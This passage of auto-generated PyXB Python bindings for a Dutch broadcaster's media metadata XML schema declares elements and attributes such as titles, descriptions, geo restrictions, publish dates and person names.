region = property(__region.value, __region.set, None, "\n Media with a geo restriction can only be played in the indicated region (NL, BENELUX, WORLD). This\n restriction doesn't apply to the metadata of the media object. It only applies to the actual playable content.\n ")
# Element {urn:vpro:media:2009}title uses Python identifier title
__title = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'title'), 'title', '__urnvpromedia2009_baseMediaType_urnvpromedia2009title', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6), )
title = property(__title.value, __title.set, None, '\n A media object has one or more titles. All titles have a type (MAIN, SUB etc.) and an owner (BROADCASTER, MIS etc.).\n The combination of type and owner is always unique for a particular media object, so a media object cannot\n have multiple titles of the same type and owner. Titles are sorted in order of the textualTypeEnum and the in order\n of ownerTypeEnum when published, so the first title in a published document will be a title owned by BROADCASTER of type\n MAIN, if that title exists.\n ')
# Element {urn:vpro:media:2009}description uses Python identifier description
__description = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'description'), 'description', '__urnvpromedia2009_baseMediaType_urnvpromedia2009description', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6), )
description = property(__description.value, __description.set, None, '\n Optional descriptions for the media object. Descriptions have an owner and a type, and are ordered just like titles.\n ')
# Element {urn:vpro:media:2009}genre uses Python identifier genre
__genre = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'genre'), 'genre', '__urnvpromedia2009_baseMediaType_urnvpromedia2009genre', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6), )
genre = property(__genre.value, __genre.set, None, None)
# Element {urn:vpro:media:2009}tag uses Python identifier tag
__tag = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'tag'), 'tag', '__urnvpromedia2009_baseMediaType_urnvpromedia2009tag', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6), )
tag = property(__tag.value, __tag.set, None, None)
# Element {urn:vpro:media:2009}intentions uses Python identifier intentions
__intentions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'intentions'), 'intentions', '__urnvpromedia2009_baseMediaType_urnvpromedia2009intentions', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6), )
intentions = property(__intentions.value, __intentions.set, None, None)
# Element {urn:vpro:media:2009}targetGroups uses Python identifier targetGroups
__targetGroups = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'targetGroups'), 'targetGroups', '__urnvpromedia2009_baseMediaType_urnvpromedia2009targetGroups', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6), )
targetGroups = property(__targetGroups.value, __targetGroups.set, None, None)
# Element {urn:vpro:media:2009}geoLocations uses Python identifier geoLocations
__geoLocations = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'geoLocations'), 'geoLocations', '__urnvpromedia2009_baseMediaType_urnvpromedia2009geoLocations', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6), )
geoLocations = property(__geoLocations.value, __geoLocations.set, None, None)
# Element {urn:vpro:media:2009}topics uses Python identifier topics
__topics = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'topics'), 'topics', '__urnvpromedia2009_baseMediaType_urnvpromedia2009topics', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6), )
topics = property(__topics.value, __topics.set, None, None)
# Element {urn:vpro:media:2009}source uses Python identifier source
__source = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'source'), 'source', '__urnvpromedia2009_baseMediaType_urnvpromedia2009source', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6), )
source = property(__source.value, __source.set, None, None)
# Element {urn:vpro:media:2009}country uses Python identifier country
__country = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'country'), 'country', '__urnvpromedia2009_baseMediaType_urnvpromedia2009country', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6), )
country = property(__country.value, __country.set, None, None)
# Element {urn:vpro:media:2009}language uses Python identifier language
__language = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'language'), 'language', '__urnvpromedia2009_baseMediaType_urnvpromedia2009language', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6), )
language = property(__language.value, __language.set, None, None)
# Element {urn:vpro:media:2009}isDubbed uses Python identifier isDubbed
__isDubbed = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'isDubbed'), 'isDubbed', '__urnvpromedia2009_baseMediaType_urnvpromedia2009isDubbed', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6), )
isDubbed = property(__isDubbed.value, __isDubbed.set, None, None)
# Element {urn:vpro:media:2009}availableSubtitles uses Python identifier availableSubtitles
__availableSubtitles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles'), 'availableSubtitles', '__urnvpromedia2009_baseMediaType_urnvpromedia2009availableSubtitles', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6), )
availableSubtitles = property(__availableSubtitles.value, __availableSubtitles.set, None, None)
# Element {urn:vpro:media:2009}avAttributes uses Python identifier avAttributes
__avAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), 'avAttributes', '__urnvpromedia2009_baseMediaType_urnvpromedia2009avAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6), )
avAttributes = property(__avAttributes.value, __avAttributes.set, None, None)
# Element {urn:vpro:media:2009}releaseYear uses Python identifier releaseYear
__releaseYear = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'releaseYear'), 'releaseYear', '__urnvpromedia2009_baseMediaType_urnvpromedia2009releaseYear', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6), )
releaseYear = property(__releaseYear.value, __releaseYear.set, None, None)
# Element {urn:vpro:media:2009}duration uses Python identifier duration
__duration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__urnvpromedia2009_baseMediaType_urnvpromedia2009duration', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6), )
duration = property(__duration.value, __duration.set, None, None)
# Element {urn:vpro:media:2009}credits uses Python identifier credits
__credits = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'credits'), 'credits', '__urnvpromedia2009_baseMediaType_urnvpromedia2009credits', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6), )
credits = property(__credits.value, __credits.set, None, None)
# Element {urn:vpro:media:2009}award uses Python identifier award
__award = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'award'), 'award', '__urnvpromedia2009_baseMediaType_urnvpromedia2009award', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6), )
award = property(__award.value, __award.set, None, None)
# Element {urn:vpro:media:2009}descendantOf uses Python identifier descendantOf
__descendantOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'descendantOf'), 'descendantOf', '__urnvpromedia2009_baseMediaType_urnvpromedia2009descendantOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6), )
descendantOf = property(__descendantOf.value, __descendantOf.set, None, None)
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_baseMediaType_urnvpromedia2009memberOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}ageRating uses Python identifier ageRating
__ageRating = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ageRating'), 'ageRating', '__urnvpromedia2009_baseMediaType_urnvpromedia2009ageRating', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6), )
ageRating = property(__ageRating.value, __ageRating.set, None, None)
# Element {urn:vpro:media:2009}contentRating uses Python identifier contentRating
__contentRating = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'contentRating'), 'contentRating', '__urnvpromedia2009_baseMediaType_urnvpromedia2009contentRating', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6), )
contentRating = property(__contentRating.value, __contentRating.set, None, None)
# Element {urn:vpro:media:2009}email uses Python identifier email
__email = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'email'), 'email', '__urnvpromedia2009_baseMediaType_urnvpromedia2009email', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6), )
email = property(__email.value, __email.set, None, None)
# Element {urn:vpro:media:2009}website uses Python identifier website
__website = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'website'), 'website', '__urnvpromedia2009_baseMediaType_urnvpromedia2009website', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6), )
website = property(__website.value, __website.set, None, None)
# Element {urn:vpro:media:2009}twitter uses Python identifier twitter
__twitter = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'twitter'), 'twitter', '__urnvpromedia2009_baseMediaType_urnvpromedia2009twitter', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6), )
twitter = property(__twitter.value, __twitter.set, None, None)
# Element {urn:vpro:media:2009}teletext uses Python identifier teletext
__teletext = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'teletext'), 'teletext', '__urnvpromedia2009_baseMediaType_urnvpromedia2009teletext', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6), )
teletext = property(__teletext.value, __teletext.set, None, None)
# Element {urn:vpro:media:2009}prediction uses Python identifier prediction
__prediction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'prediction'), 'prediction', '__urnvpromedia2009_baseMediaType_urnvpromedia2009prediction', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6), )
prediction = property(__prediction.value, __prediction.set, None, None)
# Element {urn:vpro:media:2009}locations uses Python identifier locations
__locations = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'locations'), 'locations', '__urnvpromedia2009_baseMediaType_urnvpromedia2009locations', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6), )
locations = property(__locations.value, __locations.set, None, None)
# Element {urn:vpro:media:2009}relation uses Python identifier relation
__relation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'relation'), 'relation', '__urnvpromedia2009_baseMediaType_urnvpromedia2009relation', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6), )
relation = property(__relation.value, __relation.set, None, None)
# Element {urn:vpro:media:2009}images uses Python identifier images
__images = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'images'), 'images', '__urnvpromedia2009_baseMediaType_urnvpromedia2009images', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6), )
images = property(__images.value, __images.set, None, None)
# Attribute mid uses Python identifier mid
__mid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'mid'), 'mid', '__urnvpromedia2009_baseMediaType_mid', _module_typeBindings.midType)
__mid._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 316, 4)
__mid._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 316, 4)
mid = property(__mid.value, __mid.set, None, None)
# Attribute avType uses Python identifier avType
__avType = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'avType'), 'avType', '__urnvpromedia2009_baseMediaType_avType', _module_typeBindings.avTypeEnum, required=True)
__avType._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 317, 4)
__avType._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 317, 4)
avType = property(__avType.value, __avType.set, None, None)
# Attribute sortDate uses Python identifier sortDate
__sortDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'sortDate'), 'sortDate', '__urnvpromedia2009_baseMediaType_sortDate', pyxb.binding.datatypes.dateTime)
__sortDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 318, 4)
__sortDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 318, 4)
sortDate = property(__sortDate.value, __sortDate.set, None, None)
# Attribute embeddable uses Python identifier embeddable
__embeddable = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'embeddable'), 'embeddable', '__urnvpromedia2009_baseMediaType_embeddable', pyxb.binding.datatypes.boolean, unicode_default='true')
__embeddable._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 319, 4)
__embeddable._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 319, 4)
embeddable = property(__embeddable.value, __embeddable.set, None, None)
# Attribute hasSubtitles uses Python identifier hasSubtitles
__hasSubtitles = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'hasSubtitles'), 'hasSubtitles', '__urnvpromedia2009_baseMediaType_hasSubtitles', pyxb.binding.datatypes.boolean, unicode_default='false')
__hasSubtitles._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 320, 4)
__hasSubtitles._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 320, 4)
hasSubtitles = property(__hasSubtitles.value, __hasSubtitles.set, None, None)
# Attribute mergedTo uses Python identifier mergedTo
__mergedTo = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'mergedTo'), 'mergedTo', '__urnvpromedia2009_baseMediaType_mergedTo', _module_typeBindings.midType)
__mergedTo._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 322, 4)
__mergedTo._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 322, 4)
mergedTo = property(__mergedTo.value, __mergedTo.set, None, None)
# Attribute urn uses Python identifier urn
__urn = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urn'), 'urn', '__urnvpromedia2009_baseMediaType_urn', pyxb.binding.datatypes.anyURI)
__urn._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
__urn._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 11, 4)
urn = property(__urn.value, __urn.set, None, None)
# Attribute publishStart uses Python identifier publishStart
__publishStart = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStart'), 'publishStart', '__urnvpromedia2009_baseMediaType_publishStart', pyxb.binding.datatypes.dateTime)
__publishStart._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
__publishStart._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 12, 4)
publishStart = property(__publishStart.value, __publishStart.set, None, None)
# Attribute publishStop uses Python identifier publishStop
__publishStop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishStop'), 'publishStop', '__urnvpromedia2009_baseMediaType_publishStop', pyxb.binding.datatypes.dateTime)
__publishStop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
__publishStop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 13, 4)
publishStop = property(__publishStop.value, __publishStop.set, None, None)
# Attribute publishDate uses Python identifier publishDate
__publishDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publishDate'), 'publishDate', '__urnvpromedia2009_baseMediaType_publishDate', pyxb.binding.datatypes.dateTime)
__publishDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
__publishDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 14, 4)
publishDate = property(__publishDate.value, __publishDate.set, None, None)
# Attribute creationDate uses Python identifier creationDate
__creationDate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'creationDate'), 'creationDate', '__urnvpromedia2009_baseMediaType_creationDate', pyxb.binding.datatypes.dateTime)
__creationDate._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
__creationDate._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 15, 4)
creationDate = property(__creationDate.value, __creationDate.set, None, None)
# Attribute lastModified uses Python identifier lastModified
__lastModified = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'lastModified'), 'lastModified', '__urnvpromedia2009_baseMediaType_lastModified', pyxb.binding.datatypes.dateTime)
__lastModified._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
__lastModified._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 16, 4)
lastModified = property(__lastModified.value, __lastModified.set, None, None)
# Attribute workflow uses Python identifier workflow
__workflow = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'workflow'), 'workflow', '__urnvpromedia2009_baseMediaType_workflow', _ImportedBinding_npoapi_xml_shared.workflowEnumType)
__workflow._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
__workflow._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 17, 4)
workflow = property(__workflow.value, __workflow.set, None, None)
_ElementMap.update({
__crid.name() : __crid,
__broadcaster.name() : __broadcaster,
__portal.name() : __portal,
__exclusive.name() : __exclusive,
__region.name() : __region,
__title.name() : __title,
__description.name() : __description,
__genre.name() : __genre,
__tag.name() : __tag,
__intentions.name() : __intentions,
__targetGroups.name() : __targetGroups,
__geoLocations.name() : __geoLocations,
__topics.name() : __topics,
__source.name() : __source,
__country.name() : __country,
__language.name() : __language,
__isDubbed.name() : __isDubbed,
__availableSubtitles.name() : __availableSubtitles,
__avAttributes.name() : __avAttributes,
__releaseYear.name() : __releaseYear,
__duration.name() : __duration,
__credits.name() : __credits,
__award.name() : __award,
__descendantOf.name() : __descendantOf,
__memberOf.name() : __memberOf,
__ageRating.name() : __ageRating,
__contentRating.name() : __contentRating,
__email.name() : __email,
__website.name() : __website,
__twitter.name() : __twitter,
__teletext.name() : __teletext,
__prediction.name() : __prediction,
__locations.name() : __locations,
__relation.name() : __relation,
__images.name() : __images
})
_AttributeMap.update({
__mid.name() : __mid,
__avType.name() : __avType,
__sortDate.name() : __sortDate,
__embeddable.name() : __embeddable,
__hasSubtitles.name() : __hasSubtitles,
__mergedTo.name() : __mergedTo,
__urn.name() : __urn,
__publishStart.name() : __publishStart,
__publishStop.name() : __publishStop,
__publishDate.name() : __publishDate,
__creationDate.name() : __creationDate,
__lastModified.name() : __lastModified,
__workflow.name() : __workflow
})
_module_typeBindings.baseMediaType = baseMediaType
Namespace.addCategoryObject('typeBinding', 'baseMediaType', baseMediaType)
# Complex type {urn:vpro:media:2009}geoRestrictionType with content type SIMPLE
class geoRestrictionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}geoRestrictionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoRestrictionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 339, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute start uses Python identifier start
__start = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'start'), 'start', '__urnvpromedia2009_geoRestrictionType_start', pyxb.binding.datatypes.dateTime)
__start._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
__start._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
start = property(__start.value, __start.set, None, None)
# Attribute stop uses Python identifier stop
__stop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'stop'), 'stop', '__urnvpromedia2009_geoRestrictionType_stop', pyxb.binding.datatypes.dateTime)
__stop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
__stop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
stop = property(__stop.value, __stop.set, None, None)
# Attribute regionId uses Python identifier regionId
__regionId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'regionId'), 'regionId', '__urnvpromedia2009_geoRestrictionType_regionId', _module_typeBindings.geoRestrictionEnum)
__regionId._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 342, 8)
__regionId._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 342, 8)
regionId = property(__regionId.value, __regionId.set, None, None)
# Attribute platform uses Python identifier platform
__platform = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'platform'), 'platform', '__urnvpromedia2009_geoRestrictionType_platform', _module_typeBindings.platformTypeEnum)
__platform._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 344, 8)
__platform._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 344, 8)
platform = property(__platform.value, __platform.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__start.name() : __start,
__stop.name() : __stop,
__regionId.name() : __regionId,
__platform.name() : __platform
})
_module_typeBindings.geoRestrictionType = geoRestrictionType
Namespace.addCategoryObject('typeBinding', 'geoRestrictionType', geoRestrictionType)
# Complex type {urn:vpro:media:2009}titleType with content type SIMPLE
class titleType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}titleType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'titleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 364, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_titleType_type', _module_typeBindings.textualTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
type = property(__type.value, __type.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_titleType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type,
__owner.name() : __owner
})
_module_typeBindings.titleType = titleType
Namespace.addCategoryObject('typeBinding', 'titleType', titleType)
# Complex type {urn:vpro:media:2009}descriptionType with content type SIMPLE
class descriptionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}descriptionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'descriptionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 380, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_descriptionType_type', _module_typeBindings.textualTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 389, 4)
type = property(__type.value, __type.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_descriptionType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 390, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type,
__owner.name() : __owner
})
_module_typeBindings.descriptionType = descriptionType
Namespace.addCategoryObject('typeBinding', 'descriptionType', descriptionType)
# Complex type {urn:vpro:media:2009}organizationType with content type SIMPLE
class organizationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}organizationType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'organizationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 447, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'id'), 'id', '__urnvpromedia2009_organizationType_id', _module_typeBindings.organizationIdType)
__id._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 450, 8)
__id._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 450, 8)
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.organizationType = organizationType
Namespace.addCategoryObject('typeBinding', 'organizationType', organizationType)
# Complex type {urn:vpro:media:2009}personType with content type ELEMENT_ONLY
class personType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}personType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'personType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 551, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}givenName uses Python identifier givenName
__givenName = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'givenName'), 'givenName', '__urnvpromedia2009_personType_urnvpromedia2009givenName', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 553, 6), )
givenName = property(__givenName.value, __givenName.set, None, None)
# Element {urn:vpro:media:2009}familyName uses Python identifier familyName
__familyName = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'familyName'), 'familyName', '__urnvpromedia2009_personType_urnvpromedia2009familyName', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 554, 6), )
